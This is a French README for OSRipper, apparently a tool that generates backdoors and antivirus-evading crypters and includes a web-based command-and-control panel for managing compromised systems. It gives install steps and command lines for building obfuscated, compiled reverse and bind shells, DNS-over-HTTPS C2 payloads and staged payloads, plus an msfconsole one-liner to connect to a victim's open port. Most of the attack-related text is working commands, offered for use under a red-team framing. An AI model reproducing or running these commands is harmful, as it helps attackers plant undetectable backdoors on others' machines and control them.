
Backdoor et Framework de crypter multi-plateforme contournant les antivirus avec une interface web légère intégrée

Générateur de payloads multiplateforme avancé et crypteur avec capacités FUD
Fonctionnalités • Démarrage rapide • Interface Web • Types de payloads • Documentation
OSRipper est un générateur de portes dérobées et un crypteur sophistiqué, totalement indétectable (FUD), conçu pour les tests d'intrusion autorisés et les opérations d'équipe rouge. Il intègre des techniques d'évasion avancées, plusieurs types de payloads et une interface C2 moderne basée sur le web pour la gestion des systèmes compromis.
| Type de payload | Description | Cas d'utilisation |
|---|---|---|
| Shell liant | Ouvre un port sur la machine victime | Accès direct lorsque les connexions inversées sont bloquées |
| Meterpreter inverse TCP | Connexion inverse chiffrée SSL/TLS | Tests d'intrusion standard |
| C2 DNS-over-HTTPS | Canal C2 furtif basé sur DoH | Contourner les restrictions réseau |
| C2 HTTPS | C2 HTTPS avec épinglage de certificat | Canal C2 sécurisé et authentifié |
| Payload étagé | Livraison web multi-étapes | Déploiement furtif renforcé |
| Crypteur de code personnalisé | Obfusquer tout script Python | Chiffrement de payload personnalisé |
# Clone du dépôt
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
# Installation des dépendances
pip3 install -r requirements.txt
# Installation du paquet
pip3 install -e .
Important — exécutez la configuration pour les fonctionnalités optionnelles (ngrok, compilation binaire) :
Sur de nombreux systèmes (notamment Linux avec un environnement Python géré de manière externe), vous devez exécuter la configuration intégrée pour que les dépendances optionnelles soient installées dans le venv propre à OSRipper. Faites-le une fois après l'installation :
osripper-cli setup
Ceci crée ~/.local/share/osripper/venv, y installe pyngrok, nuitka et sandboxed, et toutes les exécutions ultérieures de osripper / osripper-cli les utiliseront automatiquement. Sans cela, les options --ngrok et --compile vous demanderont d'exécuter la configuration. Utilisez osripper-cli setup --system uniquement si vous préférez une installation pip système/utilisateur plutôt que le venv.
Mode interactif :
osripper
# ou
python3 -m osripper
Ligne de commande :
# Générer un shell inverse
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile
# Générer un payload C2 DoH
osripper-cli doh -d example.com --obfuscate --compile
Interface Web :
# Démarrer le serveur C2 avec l'interface Web
python -m osripper.c2.server example.com --port 5000
# Accéder au tableau de bord à http://localhost:5000
OSRipper inclut une interface C2 moderne basée sur le web pour la gestion des systèmes compromis.
# Utilisation de base
python -m osripper.c2.server example.com
# Avec HTTPS
python -m osripper.c2.server example.com --https
# Port personnalisé
python -m osripper.c2.server example.com --port 8080
# Avec certificat personnalisé
python -m osripper.c2.server example.com --https --cert server.crt --key server.key
Une fois le serveur en cours d'exécution, accédez au tableau de bord à :
http://localhost:5000https://localhost:5000 (si activé)Ouvre un port sur la machine victime et attend les connexions.
osripper-cli bind -p 4444 --obfuscate --compile
Connexion :
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'
Connexion inverse chiffrée avec SSL/TLS.
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile
Canal C2 furtif utilisant le protocole DNS-over-HTTPS. Contourne de nombreuses restrictions réseau.
# Générer le payload
osripper-cli doh -d example.com --obfuscate --compile
# Démarrer le serveur C2
python -m osripper.c2.server example.com
Fonctionnalités :
C2 HTTPS sécurisé avec épinglage de certificat pour l'authentification.